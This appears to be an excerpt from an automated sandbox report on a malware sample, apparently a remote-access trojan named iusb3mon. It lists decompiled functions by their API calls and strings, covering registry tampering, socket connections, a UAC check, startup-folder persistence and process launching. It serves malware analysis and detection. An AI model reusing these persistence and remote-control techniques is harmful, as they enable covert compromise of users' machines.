FreeLibrary.KERNEL32(00000000,?,00000000,06CFADE0,06D0E538,000000FF,?,06CF56BE,80000001,Console,Groupfenzhu,00000001), ref: 06CF9592

Strings

RegDeleteValueA, xrefs: 06CF9482
Console, xrefs: 06CF9445
RegOpenKeyExA, xrefs: 06CF948D
RegCreateKeyExA, xrefs: 06CF945B
ADVAPI32.dll, xrefs: 06CF944B
RegSetValueExA, xrefs: 06CF946C
RegDeleteKeyA, xrefs: 06CF9477
RegCloseKey, xrefs: 06CF9498

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: ADVAPI32.dll$Console$RegCloseKey$RegCreateKeyExA$RegDeleteKeyA$RegDeleteValueA$RegOpenKeyExA$RegSetValueExA
API String ID: 2449869053-4282833508
Opcode ID: 2d99c6eeb4f9d76877b9762ad154c8eaaaea0bcdcfcd5cec6f26edbc09e94670
Instruction ID: 77a3add61cccd26a3e58ddaa35ee662249a0f74c5b3777365daaa6c1506d1e88
Opcode Fuzzy Hash: 2d99c6eeb4f9d76877b9762ad154c8eaaaea0bcdcfcd5cec6f26edbc09e94670
Instruction Fuzzy Hash: 35414A71D1021DBFEF959FA5DC84EFEBB79FB48655F00422AFA10A2160D7708A04DBA0

Function 06CF91B3 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 183libraryloaderstringCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93CF
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

Strings

RegQueryValueExA, xrefs: 06CF9222
RegOpenKeyExA, xrefs: 06CF9233
RegEnumValueA, xrefs: 06CF9243
ADVAPI32.dll, xrefs: 06CF9211
RegEnumKeyExA, xrefs: 06CF9250
%08X, xrefs: 06CF938F
RegCloseKey, xrefs: 06CF925D

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadlstrcpy
String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 2888591476-2913591164
Opcode ID: 3ea47413685b38789f091573278e484e9f30355da42901c35e7e0a710e25d531
Instruction ID: ff8c89555fdde4db8fd6d16681f618f43e15514e9985097528b2e8bbd55b9e6d
Opcode Fuzzy Hash: 3ea47413685b38789f091573278e484e9f30355da42901c35e7e0a710e25d531
Instruction Fuzzy Hash: 7F61F871D1021DAFDFA19FA1DC84FEEBBB9FB08300F00056AFA19A2150D6719A59DF61

Function 06CF8ADE Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 174libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06CF8B17
GetProcAddress.KERNEL32(00000000,socket), ref: 06CF8B2C
GetProcAddress.KERNEL32(?,recv), ref: 06CF8B39
GetProcAddress.KERNEL32(?,connect), ref: 06CF8B46
GetProcAddress.KERNEL32(?,getsockname), ref: 06CF8B53
GetProcAddress.KERNEL32(?,select), ref: 06CF8B60
GetLastError.KERNEL32(00000000), ref: 06CF8B9D
WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,?,00000010), ref: 06CF8C38
GetLastError.KERNEL32(?,?,?,?,?,00000010), ref: 06CF8CA2
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 06CF8CD3

Strings

ws2_32.dll, xrefs: 06CF8B12
select, xrefs: 06CF8B55
socket, xrefs: 06CF8B23
connect, xrefs: 06CF8B3B
recv, xrefs: 06CF8B2E
getsockname, xrefs: 06CF8B48

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLastLibrary$FreeLoadObjectSingleWait
String ID: connect$getsockname$recv$select$socket$ws2_32.dll
API String ID: 1315272698-1466708075
Opcode ID: 4f4319d69fee3ad8099b7721dd669d2eacd6ad5297e1dcff78d58bf7770c907a
Instruction ID: e0f346e77b6a87f630c1b99b5e080cbcc8d8147cbe081bb0be3163104aee1e9a
Opcode Fuzzy Hash: 4f4319d69fee3ad8099b7721dd669d2eacd6ad5297e1dcff78d58bf7770c907a
Instruction Fuzzy Hash: 08617A72D0121CFBDFA09FA0DC49ADEBBB9EF04310F104555EA15AA290D7709A89CF90

Function 06D0ADCD Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 06D0B4CB: GetWindowLongA.USER32(?,000000F0), ref: 06D0B4D7

GetParent.USER32(?), ref: 06D0ADF8
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 06D0AE1B
GetWindowRect.USER32(?,?), ref: 06D0AE34
GetWindowLongA.USER32(00000000,000000F0), ref: 06D0AE47
CopyRect.USER32(?,?), ref: 06D0AE94
CopyRect.USER32(?,?), ref: 06D0AE9E
GetWindowRect.USER32(00000000,?), ref: 06D0AEA7
CopyRect.USER32(?,?), ref: 06D0AEC3

Strings

@, xrefs: 06D0AE36
(, xrefs: 06D0AE5F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: cb6b1d141dc93dd342a8bdacb25c2e981fd51572e5b1f3d063e280a50bdbf200
Instruction ID: 121b03e46fe70608ec1ea45afa5033b0d4b0e26709e70643c94d8e281b985fac
Opcode Fuzzy Hash: cb6b1d141dc93dd342a8bdacb25c2e981fd51572e5b1f3d063e280a50bdbf200
Instruction Fuzzy Hash: 95513D72E00219AFEB54DBA8DC84FAEBBBDEB48710F194515FA11F32C1D670E9458B60

Function 06CF5AA1 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138registrystringprocessCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 06CF5AEA
RegQueryValueA.ADVAPI32(00000000,00000000,?,06CF5CD7), ref: 06CF5B09
RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 06CF5B14
wsprintfA.USER32 ref: 06CF5B3C
RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 06CF5B5C
RegQueryValueA.ADVAPI32(00000000,00000000,?,06CF5CD7), ref: 06CF5B93
RegCloseKey.ADVAPI32(00000000), ref: 06CF5B98
lstrcatA.KERNEL32(?,06D17D6C), ref: 06CF5BDA
lstrcatA.KERNEL32(?,06CF5CD7), ref: 06CF5BE6
lstrcpyA.KERNEL32(00000000,06CF5CD7), ref: 06CF5BEE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06CF5C27

Strings

%s\shell\open\command, xrefs: 06CF5B36
WinSta0\Default, xrefs: 06CF5C0A
D, xrefs: 06CF5C01
"%1, xrefs: 06CF5BA0

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValuelstrcat$CreateProcesslstrcpywsprintf
String ID: "%1$%s\shell\open\command$D$WinSta0\Default
API String ID: 1351118359-33419044
Opcode ID: cabf14819c44b27bbf8ebdc871d90c373c52b6fb2e3fe4b2fe69381e9ace9ca0
Instruction ID: f9d380a30c7eb861165aeaa90aad05827ef908b48ed95e98afc3bbcde5255743
Opcode Fuzzy Hash: cabf14819c44b27bbf8ebdc871d90c373c52b6fb2e3fe4b2fe69381e9ace9ca0
Instruction Fuzzy Hash: 3B415D7290011CBBDBA19BA1DC45FEFBB7DEB48700F1404A5B705E6150E6719B89DBA0

Function 06CF7715 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 125stringmemoryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00000000,?,00006365), ref: 06CF7748
GetCurrentProcess.KERNEL32(00000008,?), ref: 06CF7779
OpenProcessToken.ADVAPI32(00000000), ref: 06CF7780
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 06CF77A2
GetLastError.KERNEL32 ref: 06CF77A8
LocalAlloc.KERNEL32(00000040,?), ref: 06CF77B8
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 06CF77D1
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 06CF77D9
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 06CF77E6
LocalFree.KERNEL32(00000000), ref: 06CF77EF
CloseHandle.KERNEL32(?), ref: 06CF77FA
lstrcpyA.KERNEL32(?,06D1E16C), ref: 06CF7848
lstrcatA.KERNEL32(?,06D1E154), ref: 06CF7892

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 06CF785E
PromptOnSecureDesktop, xrefs: 06CF7859

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpenVersionlstrcatlstrcpy
String ID: PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 209792486-2497808001
Opcode ID: 05e5931e99fcf83c696f9130821213f28444b35772da147f07b84f33f9b37fff
Instruction ID: ee38a0ac3475f008063fb9083b0038bc8c20dc98b9bcd10655eb7dd8519d67bd
Opcode Fuzzy Hash: 05e5931e99fcf83c696f9130821213f28444b35772da147f07b84f33f9b37fff
Instruction Fuzzy Hash: 3B418F70D10209FFFBE15B61EC49FAE7B79EB45701F10046AFB01A5250D7B18698CAB1

Function 06CF71D0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Ole32.dll,00000000,?,00006365), ref: 06CF71E4
GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 06CF71F4
GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 06CF71FF
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 06CF720A
LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,06CF7A46), ref: 06CF7214
GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 06CF721F
FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06CF7A46), ref: 06CF72E1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,06CF7A46), ref: 06CF72EB

Strings

Oleaut32.dll, xrefs: 06CF720C
FriendlyName, xrefs: 06CF72AA
CoInitialize, xrefs: 06CF71EE
CoCreateInstance, xrefs: 06CF7201
Ole32.dll, xrefs: 06CF71DF
SysFreeString, xrefs: 06CF7216
CoUninitialize, xrefs: 06CF71F6

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
API String ID: 2256533930-3340630095
Opcode ID: 5ba0b4bf945db57a5f22c6ef7e97fd9ceb50c19f33dd24f28fb7d60dedfa4760
Instruction ID: 4879240b4a7716290c4c55032b2dd255f3774587794543f121e835852bb9573c
Opcode Fuzzy Hash: 5ba0b4bf945db57a5f22c6ef7e97fd9ceb50c19f33dd24f28fb7d60dedfa4760
Instruction Fuzzy Hash: 20411B70E00219FFDB90DBA6DC88EAFBBB9EF84714B104459F505E7211DAB1DA05CBA0

Function 06CF8DF3 Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 06CF8E24
GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 06CF8E37
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 06CF8E42
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 06CF8E4D
GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 06CF8E5B
LoadLibraryA.KERNEL32(kernel32.dll), ref: 06CF8E65
GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 06CF8E70

Strings

tDesktop, xrefs: 06CF8E98
kernel32.dll, xrefs: 06CF8E60
GetUserObjectInformationA, xrefs: 06CF8E3C
GetThreadDesktop, xrefs: 06CF8E2B
user32.dll, xrefs: 06CF8E19
SetThreadDesktop, xrefs: 06CF8E47
GetCurrentThreadId, xrefs: 06CF8E6A
CloseDesktop, xrefs: 06CF8E55

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$tDesktop$user32.dll
API String ID: 2238633743-1569342589
Opcode ID: d0b432bc593837fe84c3fa92783a93045a1db4c200ac9711f07bece359adab6c
Instruction ID: a87bdef7458e7fd15164051971b7e5c4202aca8d013334ff7bf8568421a5731f
Opcode Fuzzy Hash: d0b432bc593837fe84c3fa92783a93045a1db4c200ac9711f07bece359adab6c
Instruction Fuzzy Hash: 4F213E71D50218BFEB509FA5DC45AEDBBB8EB48710F004526F915F6290E7B49A048BA0

Function 06D03DFB Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,06D03F34), ref: 06D03E1D
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 06D03E35
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 06D03E46
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 06D03E57
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 06D03E68
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 06D03E79
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 06D03E8A

Strings

USER32, xrefs: 06D03E18
MonitorFromWindow, xrefs: 06D03E40
MonitorFromPoint, xrefs: 06D03E62
GetSystemMetrics, xrefs: 06D03E2F
MonitorFromRect, xrefs: 06D03E51
GetMonitorInfoA, xrefs: 06D03E84
EnumDisplayMonitors, xrefs: 06D03E73

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: 56ae1fe9a8287f8a5cf427d11521fe4c5e2574372d4f29d10cd0c8ce4e8484dc
Instruction ID: ee2c3eb0957d31338134929265984d126f5654f48b1fc71c30258eed614d7e06
Opcode Fuzzy Hash: 56ae1fe9a8287f8a5cf427d11521fe4c5e2574372d4f29d10cd0c8ce4e8484dc
Instruction Fuzzy Hash: C81121F0901B13ABE3B19F35ACC462ABAE6BB5D651365063ED604D6384C770848EEB61

Function 06CF789D Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 145stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 06CF78C0
lstrlenA.KERNEL32(?,00000000), ref: 06CF78E2

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

getsockname.WS2_32(?,?,?), ref: 06CF7944
GetVersionExA.KERNEL32(?), ref: 06CF7985
GetLastInputInfo.USER32(?), ref: 06CF79F3
GetTickCount.KERNEL32 ref: 06CF79F9
GlobalMemoryStatusEx.KERNEL32(?), ref: 06CF7A1E

Strings

@, xrefs: 06CF7A16
Console, xrefs: 06CF78F8
Groupfenzhu, xrefs: 06CF78F3
RDP-Tcp, xrefs: 06CF7A69
SYSTEM\CurrentControlSet\Services\%s, xrefs: 06CF78B3
12.14, xrefs: 06CF7A52

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CountFreeGlobalInfoInputLastLoadMemoryStatusTickVersiongetsocknamelstrlenwsprintf
String ID: 12.14$@$Console$Groupfenzhu$RDP-Tcp$SYSTEM\CurrentControlSet\Services\%s
API String ID: 1372434316-946073997
Opcode ID: 6fc6116a4416af2d220e9f59c8f1fa44faebd985f93b9f1243d8a5fe9ef43c3f
Instruction ID: 5bcba406b351a4eb8b5dc9c23381a0ad9c2dd4eaa2ad9d0b27b68cb2e08cb64c
Opcode Fuzzy Hash: 6fc6116a4416af2d220e9f59c8f1fa44faebd985f93b9f1243d8a5fe9ef43c3f
Instruction Fuzzy Hash: D651FE72D5021CBADBE0EBE0DC49FCEB7BCAB44710F404596A619E6240DB749788DF61

Function 06CF898B Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 110libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06CF89A5
GetProcAddress.KERNEL32(00000000,closesocket), ref: 06CF89B0
wsprintfA.USER32 ref: 06CF89E1
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06CF8A3E
GetProcAddress.KERNEL32(00000000,send), ref: 06CF8A46
GetLastError.KERNEL32 ref: 06CF8A6B
CloseHandle.KERNEL32(00000000), ref: 06CF8AAF
Sleep.KERNEL32(00000002), ref: 06CF8ABC
FreeLibrary.KERNEL32(00000000), ref: 06CF8AD4

Strings

ws2_32.dll, xrefs: 06CF89A0, 06CF8A39
ID= %d , xrefs: 06CF89DB
send, xrefs: 06CF8A40
closesocket, xrefs: 06CF89A7

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
String ID: ID= %d $closesocket$send$ws2_32.dll
API String ID: 872202526-2339802411
Opcode ID: 4f2a15d78dffc3967876cb86eb7ff8501579e7255f097ea821f4380995ba9e1f
Instruction ID: f30538851e511990e62f9f2fafce441805d57d983ba0b064fb9a8dfbcf5d70c1
Opcode Fuzzy Hash: 4f2a15d78dffc3967876cb86eb7ff8501579e7255f097ea821f4380995ba9e1f
Instruction Fuzzy Hash: AA41CB31D11219FFEBA4CFA0D849BAEBBB9FF05301F104459E605A6280C770AB44CB91

Function 06CF38D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF3910
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF3921
wsprintfA.USER32 ref: 06CF393F
wsprintfA.USER32 ref: 06CF3959
GetFileAttributesA.KERNEL32(?), ref: 06CF3965
wsprintfA.USER32 ref: 06CF3983
Sleep.KERNEL32(00000064), ref: 06CF398A
CopyFileA.KERNEL32(?,?,00000000), ref: 06CF399F
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 06CF39AF
CreateDirectoryA.KERNEL32(?,00000000), ref: 06CF39BD

Part of subcall function 06CF3777: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06CF3788
Part of subcall function 06CF3777: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06CF37B8
Part of subcall function 06CF3777: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06CF37D1
Part of subcall function 06CF3777: GetFileSize.KERNEL32(00000000,00000000), ref: 06CF37D9
Part of subcall function 06CF3777: _rand.LIBCMT ref: 06CF381A
Part of subcall function 06CF3777: WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 06CF384F
Part of subcall function 06CF3777: CloseHandle.KERNEL32(?), ref: 06CF3860

SetFileAttributesA.KERNEL32(?,00000000), ref: 06CF39DF

Strings

%s\%s, xrefs: 06CF3944, 06CF3957, 06CF3981
%s.exe, xrefs: 06CF3939

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$wsprintf$AttributesCreate$CloseCopyDirectoryFolderHandleLibraryLoadModuleMoveNamePathPointerSizeSleepSpecialWrite_rand
